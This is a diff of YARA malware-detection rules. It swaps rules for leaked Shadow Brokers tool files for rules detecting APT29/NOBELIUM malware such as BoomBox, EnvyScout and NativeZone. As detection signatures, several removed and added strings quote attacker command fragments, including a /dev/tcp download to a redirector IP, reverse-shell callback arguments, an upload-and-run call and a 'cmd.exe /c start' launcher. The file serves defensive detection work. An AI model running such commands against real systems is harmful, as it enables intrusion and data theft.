-		hash1 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
+		tags = "FILE"
 
 	strings:
-		$x1 = "-i tgt_ipaddr -h tgt_hostname" fullword ascii
+		$x1 = "[i].charCodeAt(0) ^ 2);}"
 
 	condition:
-		1 of them
+		filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Gr_Gr
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_JS_Envyscout_May21_2 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file gr.notes"
+		description = "Detects EnvyScout deobfuscator code as used by NOBELIUM group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c233159d-8d78-575b-b32b-21f704debfe2"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L88-L101"
+		id = "d5cf3365-fe24-533a-a678-b5b6d4d99997"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L69-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "facce45a335d7ca799d68fc26ee2bf5682cec0914502482189cd6aa496cba489"
+		logic_hash = "6f5c50b340d628559799897a2ba79add7d126e3ecb2daeb365bc15d64796ccd2"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b2b60dce7a4cfdddbd3d3f1825f1885728956bae009de3a307342fbdeeafcb79"
+		tags = "FILE"
 
 	strings:
-		$s4 = "delete starting from: (root) LIST (root)" fullword ascii
+		$s1 = "saveAs(blob, " ascii
+		$s2 = ".iso\");" ascii
+		$s3 = "application/x-cd-image" ascii
+		$s4 = ".indexOf(\"Win\")!=-1" ascii
 
 	condition:
-		1 of them
+		filesize < 5000KB and all of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Yellowspirit
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_LNK_NV_Link_May21_2 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.yellowspirit.COMMON"
+		description = "Detects NV Link as used by NOBELIUM group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L103-L117"
+		id = "52c2caf9-13df-5614-9c9e-afcd76ec77f9"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L85-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "698b23cc4cc6f319ddef7a93cf7ddc83ffae1d2c2b0a9545011b51e381f8cd0c"
+		logic_hash = "5eee9df368da3fc98c00a0f8c65a7f3bd5b812342082be58054b272b5bb03455"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a7c4b718fa92934a9182567288146ffa3312d9f3edc3872478c90e0e2814078c"
+		tags = "FILE"
 
 	strings:
-		$s1 = "-l 19.16.1.1 -i 10.0.3.1 -n 2222 -r nscd -x 9999" fullword ascii
-		$s2 = "-s PITCH_IP -x PITCH_IP -y RHP-24 TARGET_IP" fullword ascii
+		$s1 = "RegisterOCX BOOM" ascii wide
+		$s2 = "cmd.exe /c start BOOM.exe" ascii wide
 
 	condition:
-		1 of them
+		filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Eleganteagle_Opscript_1_0_0
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_LNK_Samples_May21_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file eleganteagle_opscript.1.0.0.6"
+		description = "Detects link file characteristics as described in APT29 NOBELIUM report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "22855519-160c-57cf-b610-a611ca6813ed"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L119-L132"
+		id = "c807ab5a-f66a-5622-81b1-6e69b6df8446"
+		date = "2021-05-27"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L99-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3df5ba1a497ffe5306ed7966f25f69c30a5191e935c5638869a62b3cb2324f70"
-		score = 75
+		logic_hash = "32d76bb1af76f0fc2afb76d9726bc8ec99c4be34c9d46cebab7356d8c68af11c"
+		score = 85
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "57e223318de0a802874642652b3dc766128f25d7e8f320c6f04c6f2659bb4f7f"
+		tags = "FILE"
+		hash1 = "24caf54e7c3fe308444093f7ac64d6d520c8f44ea4251e09e24931bdb72f5548"
 
 	strings:
-		$x3 = "uploadnrun -e \"D=-ucIP_ADDRESS_OF_REDIR" ascii
+		$a1 = "rundll32.exe" wide
+		$sa1 = "IMGMountingService.dll" wide
+		$sa2 = "MountImgHelper" wide
+		$sb1 = "diassvcs.dll" wide
+		$sb2 = "InitializeComponent" wide
+		$sc1 = "MsDiskMountService.dll" wide
+		$sc2 = "DiskDriveIni" wide
+		$sd1 = "GraphicalComponent.dll" wide
+		$sd2 = "VisualServiceComponent" wide
+		$se1 = "data/mstu.dll,MicrosoftUpdateService" wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x004c and filesize < 4KB and $a1 and ( all of ( $sa* ) or all of ( $sb* ) or all of ( $sc* ) or all of ( $sd* ) or all of ( $se* ) )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Opscript
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Boombox_May21_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file opscript.se"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d00752a3-d5c2-53a7-9a83-ad31cfb534af"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L134-L147"
+		description = "Detects BoomBox malware as described in APT29 NOBELIUM report"
+		author = "Florian Roth"
+		id = "1a14dcf7-81be-5a74-a530-caf6268d1976"
+		date = "2021-05-27"
+		modified = "2025-03-20"
+		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L130-L161"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "23dd6d537a8639bd84ede141cca577dc91328bd293f96f865c7dedd9ef693ee3"
-		score = 75
+		hash = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27"
+		logic_hash = "034ea34eb34ea6de0c65b9a7fc9d16f108ef34cd75294b022371ac17789c3830"
+		score = 85
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "275c91531a9ac5a240336714093b6aa146b8d7463cb2780cfeeceaea4c789682"
+		tags = "FILE"
 
 	strings:
-		$s1 = "ls -l /tmp) | bdes -k 0x4790cae5ec154ccc|" ascii
+		$a1 = "]::FromBase64String($" ascii wide
+		$xa1 = "123do3y4r378o5t34onf7t3o573tfo73" ascii wide fullword
+		$xa2 = "1233t04p7jn3n4rg" ascii wide fullword
+		$s1 = "\\Release\\BOOM.pdb" ascii
+		$s2 = "/files/upload" ascii
+		$s3 = "/tmp/readme.pdf" ascii fullword
+		$s4 = "/new/{0}" ascii fullword
+		$s5 = "(&(objectClass=user)(objectCategory=person))"
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d or 1 of ( $a* ) ) and ( 1 of ( $x* ) or 3 of ( $s* ) )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Shentysdelight
+
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Boombox_PDF_Masq_May21_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.shentysdelight.COMMON"
+		description = "Detects PDF documents as used by BoomBox as described in APT29 NOBELIUM report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L149-L162"
+		id = "bdfb9600-edda-5c8c-ab23-14fb71c8e647"
+		date = "2021-05-27"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L163-L182"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1acfb6aea7e208b7fd52325258219c162482deb4fa7ee87ddc4de0774e3e74f4"
-		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a564efeaae9c13fe09a27f2d62208a1dec0a19b4a156f5cfa96a0259366b8166"
+		logic_hash = "8f1514648b2b797adfe3f8f5acb577c26707dfe1da942c9634be3d88a180a407"
+		score = 70
+		quality = 35
+		tags = "FILE"
 
 	strings:
-		$s1 = "echo -ne \"/var/run/COLFILE\\0\"" fullword ascii
+		$ah1 = { 25 50 44 46 2d 31 2e 33 0a 25 }
+		$af1 = { 0a 25 25 45 4f 46 0a }
+		$fp1 = "endobj" ascii
+		$fp2 = "endstream" ascii
+		$fp3 = { 20 6F 62 6A 0A }
 
 	condition:
-		1 of them
+		$ah1 at 0 and $af1 at ( filesize -7 ) and filesize < 100KB and not 1 of ( $fp* ) and math.entropy ( 16 , filesize ) > 7
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Epichero
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Nativezone_Loader_May21_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.epichero.COMMON"
+		description = "Detects NativeZone loader as described in APT29 NOBELIUM report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L164-L178"
+		id = "02d9257d-f439-5071-96b0-a973b088e329"
+		date = "2021-05-27"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L184-L204"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "36dc38f2dd630f22b87e8d9130de7d40ee3cdba45597b2b667a1a9536d990aad"
-		score = 75
+		logic_hash = "a02fd6fcd7423781bbd2e4458bd61d28e16a5b1a73b1682e63db5c86d53c7da4"
+		score = 85
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "679d194c32cbaead7281df9afd17bca536ee9d28df917b422083ae8ed5b5c484"
+		tags = "FILE"
+		hash1 = "136f4083b67bc8dc999eb15bb83042aeb01791fc0b20b5683af6b4ddcf0bbc7d"
 
 	strings:
-		$x2 = "-irtun TARGET_IP ISH_CALLBACK_PORT"
-		$x3 = "-O REVERSE_SHELL_CALLBACK_PORT -w HIDDEN_DIR" fullword ascii
+		$s1 = "\\SystemCertificates\\Lib\\CertPKIProvider.dll" ascii
+		$s2 = "rundll32.exe %s %s" ascii fullword
+		$s3 = "eglGetConfigs" ascii fullword
+		$op1 = { 80 3d 74 8c 01 10 00 0f 85 96 00 00 00 33 c0 40 b9 6c 8c 01 10 87 01 33 db 89 5d fc }
+		$op2 = { 8b 46 18 e9 30 ff ff ff 90 87 2f 00 10 90 2f 00 10 }
+		$op3 = { e8 14 dd ff ff 8b f1 80 3d 74 8c 01 10 00 0f 85 96 00 00 00 33 c0 40 b9 6c 8c 01 10 87 01 }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 3 of them or 4 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Boombox_May21_2 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.elatedmonkey"
+		description = "Detects BoomBox malware used by APT29 / NOBELIUM"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L180-L193"
+		id = "a4144c00-48b2-5520-b773-5d0a5de95fb1"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L206-L234"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8135c07b8c217e81f7618d58c9c3da6585cdb9b8f7afab85bb6556c5b846ba64"
+		logic_hash = "2a3829e704af2464639d07e8e7952669281e20cf2a7ac487d5d1eee021d08b35"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "98ae935dd9515529a34478cb82644828d94a2d273816d50485665535454e37cd"
+		tags = "FILE"
+		hash1 = "0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec"
+		hash2 = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27"
+		hash3 = "cf1d992f776421f72eabc31d5afc2f2067ae856f1c9c1d6dc643a67cb9349d8c"
 
 	strings:
-		$x5 = "ELATEDMONKEY will only work of apache executes scripts" fullword ascii
+		$x1 = "\\Microsoft\\NativeCache\\NativeCacheSvc.dll" wide
+		$x2 = "\\NativeCacheSvc.dll _configNativeCache" wide
+		$a1 = "/content.dropboxapi.com" wide fullword
+		$s1 = "rundll32.exe {0} {1}" wide fullword
+		$s2 = "\\\\CertPKIProvider.dll" wide
+		$s3 = "/tmp/readme.pdf" wide
+		$s4 = "temp/[^\"]*)\"" wide fullword
+		$op1 = { 00 78 00 2d 00 41 00 50 00 49 00 2d 00 41 00 72 00 67 00 01 2f 4f 00 72 00 }
+		$op2 = { 25 72 98 01 00 70 6f 34 00 00 0a 25 6f 35 00 00 0a 72 71 02 00 70 72 }
+		$op3 = { 4d 05 20 00 12 80 91 04 20 01 08 0e 04 20 00 12 }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and 3 of them or 4 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Dubmoat
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Malware_May21_2 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.dubmoat.COMMON"
+		description = "Detects malware used by APT29 / NOBELIUM"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d6c0a00b-dda9-587f-a867-f3b632edd494"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L195-L209"
+		id = "b1462b4b-227f-5aeb-92ea-bda6a86831c7"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L236-L252"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "368c0a6a1db0003e3a2e4ec5e42a5b5563ea1c2cb89db1751226891e1f7181d8"
+		logic_hash = "18a52f5fd71455b8564d4b485c233dd358a304bfddc5e6fb604b8e5a2a1949a3"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bcd4ee336050488f5ffeb850d8eaa11eec34d8ba099b370d94d2c83f08a4d881"
+		tags = "FILE"
+		hash1 = "292e5b0a12fea4ff3fc02e1f98b7a370f88152ce71fe62670dd2f5edfaab2ff8"
+		hash2 = "776014a63bf3cc7034bd5b6a9c36c75a930b59182fe232535bb7a305e539967b"
 
 	strings:
-		$s1 = "### Verify version on target:" fullword ascii
-		$s2 = "/current/bin/ExtractData ./utmp > dub.TARGETNAME" fullword ascii
+		$op1 = { 48 03 c8 42 0f b6 04 21 88 03 0f b6 43 01 8b c8 83 e0 0f 48 83 e1 f0 48 03 c8 }
+		$op2 = { 48 03 c8 42 0f b6 04 21 88 43 01 41 0f b6 c7 8b c8 83 e0 0f 48 83 e1 f0 48 03 c8 }
+		$op3 = { 45 0f b6 43 ff 41 8b c2 99 44 88 03 41 0f b6 2b 83 e2 03 03 c2 40 88 6b 01 }
 
 	condition:
-		1 of them
+		filesize < 2200KB and all of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_Strifeworld
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Stageless_Loader_May21_2 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file strifeworld.1"
+		description = "Detects stageless loader as used by APT29 / NOBELIUM"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a15c2034-8394-5e62-a5f0-d1506c19e585"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L211-L225"
+		id = "7b83d327-52fc-5401-ae35-00f6b825678a"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L254-L276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2b113b042fd62109ee3ee39515fbd22f3898abf320d75f1288ea88e40b3444c0"
+		logic_hash = "850f6a1ad342fd5e4bb29c7bf90a032ddd8ac9d2eac5ffcbedf43e4d04b178f5"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "222b00235bf143645ad0d55b2b6839febc5b570e3def00b77699915a7c9cb670"
+		tags = "FILE"
+		hash1 = "a4f1f09a2b9bc87de90891da6c0fca28e2f88fd67034648060cef9862af9a3bf"
+		hash2 = "c4ff632696ec6e406388e1d42421b3cd3b5f79dcb2df67e2022d961d5f5a9e78"
 
 	strings:
-		$s4 = "-p -n.\" strifeworld" fullword ascii
-		$s5 = "Running STRIFEWORLD not protected" ascii
+		$x1 = "DLL_stageless.dll" ascii fullword
+		$s1 = "c:\\users\\devuser\\documents" ascii fullword nocase
+		$s2 = "VisualServiceComponent" ascii fullword
+		$s3 = "CheckUpdteFrameJavaCurrentVersion" ascii fullword
+		$op1 = { a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 68 d8 d4 00 10 57 a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 }
+		$op2 = { ff d6 33 05 00 ?0 0? 10 68 d8 d4 00 10 57 a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 68 e8 d4 00 10 }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and 2 of them or 3 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Pork
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Malware_May21_3 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.pork.COMMON"
+		description = "Detects malware used by APT29 / NOBELIUM"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ee5f88b1-6e58-5288-8b80-0d3d188e1ac6"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L227-L242"
+		id = "89cb6884-4242-5b5a-b0ac-b31041dd261c"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L278-L300"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c3f9f90f83f3672b101e52f36012c485c29840cf0b2ced00087fb27725fd1545"
+		logic_hash = "472acd1d6daf3480de59ecd3fa038d644e339dcc979cf7e56617eadc6cb32dc5"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9c400aab74e75be8770387d35ca219285e2cedc0c7895225bbe567ce9c9dc078"
+		tags = "FILE"
+		hash1 = "2a352380d61e89c89f03f4008044241a38751284995d000c73acf9cad38b989e"
 
 	strings:
-		$x2 = "packrat -z RAT_REMOTE_NAME" fullword ascii
-		$s3 = "./client -t TIME_ADJ SPECIAL_SOURCE_PORT 127.0.0.1 TARG_PORT" ascii
-		$s4 = "mkdir TEMP_DIR; cd TEMP_DIR; cat < /dev/tcp/REDIR_IP/RED" ascii
+		$s1 = "Win32Project1.dll" ascii fullword
+		$op1 = { 59 c3 6a 08 68 70 5e 01 10 e8 d2 8c ff ff 8b 7d 08 8b c7 c1 f8 05 }
+		$op2 = { 8d 4d f0 e8 c4 12 00 00 68 64 5b 01 10 8d 45 f0 c7 45 f0 6c 01 01 10 50 e8 ea 13 00 00 cc }
+		$op4 = { 40 c3 8b 65 e8 e8 a6 86 ff ff cc 6a 0c 68 88 60 01 10 e8 b0 4d ff ff }
+		$xc1 = { 25 73 25 73 00 00 00 00 2F 65 2C 20 00 00 00 00
+               43 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00
+               77 00 73 00 5C 00 65 00 78 00 70 00 6C 00 6F 00
+               72 00 65 00 72 00 2E 00 65 00 78 00 65 }
 
 	condition:
-		1 of them
+		filesize < 3000KB and ( $xc1 or 3 of them )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Ebbisland
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Malware_May21_4 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.ebbisland.COMMON"
+		description = "Detects malware used by APT29 / NOBELIUM"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd312ba2-d590-5007-875c-008553c2b1b9"
-		date = "2016-12-17"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L244-L258"
+		id = "56193475-52b4-5720-abc5-72249e2a0c37"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L302-L323"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0a45ea3cd6aeea9299ef67ae82c9f4bf929a961695e7cce344aa1737fa4c07b0"
+		logic_hash = "7d5858cc6dab094d5dceab75a2002d9145537008241a08ac7bd399c9d6e6c270"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "390e776ae15fadad2e3825a5e2e06c4f8de6d71813bef42052c7fd8494146222"
+		tags = "FILE"
+		hash1 = "3b94cc71c325f9068105b9e7d5c9667b1de2bde85b7abc5b29ff649fd54715c4"
 
 	strings:
-		$x1 = "-t 127.0.0.1 -p SERVICE_TCP_PORT -r TARGET_RPC_SERVICE -X"
-		$x2 = "-N -A SPECIFIC_SHELLCODE_ADDRESS" fullword ascii
+		$s1 = "KM.FileSystem.dll" ascii fullword
+		$op1 = { 80 3d 50 6b 04 10 00 0f 85 96 00 00 00 33 c0 40 b9 48 6b 04 10 87 01 33 db 89 5d fc }
+		$op2 = { c3 33 c0 b9 7c 6f 04 10 40 87 01 c3 8b ff 55 }
+		$op3 = { 8d 4d f4 e8 53 ff ff ff 68 d0 22 01 10 8d 45 f4 50 e8 d8 05 00 00 cc 8b 41 04 }
+		$xc1 = { 2E 64 6C 6C 00 00 00 00 41 53 4B 4F 44 00 00 00
+               53 75 63 63 65 73 73 }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( $xc1 or 3 of them )
 }
-rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Stoicsurgeon
+
+rule SIGNATURE_BASE_Cmstar_Malware_Sep17 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file user.tool.stoicsurgeon.COMMON"
+		description = "Detects CMStar Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2ff22b17-4922-54d7-bbd8-a5ff40b6ebe5"
-		date = "2016-12-17"
+		id = "d6c9cd7f-06ce-5641-b9b2-c81daf18628d"
+		date = "2017-10-03"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L260-L273"
+		reference = "https://goo.gl/pTffPA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cmstar.yar#L13-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "322599ba7d5536b7f0856980a6caab86de66c02da75bf55e97bf129d08c43031"
+		logic_hash = "498b6a3e02cf4979babe6379c2d6b3529d2a28210d44a8ce05aef1acdd325953"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
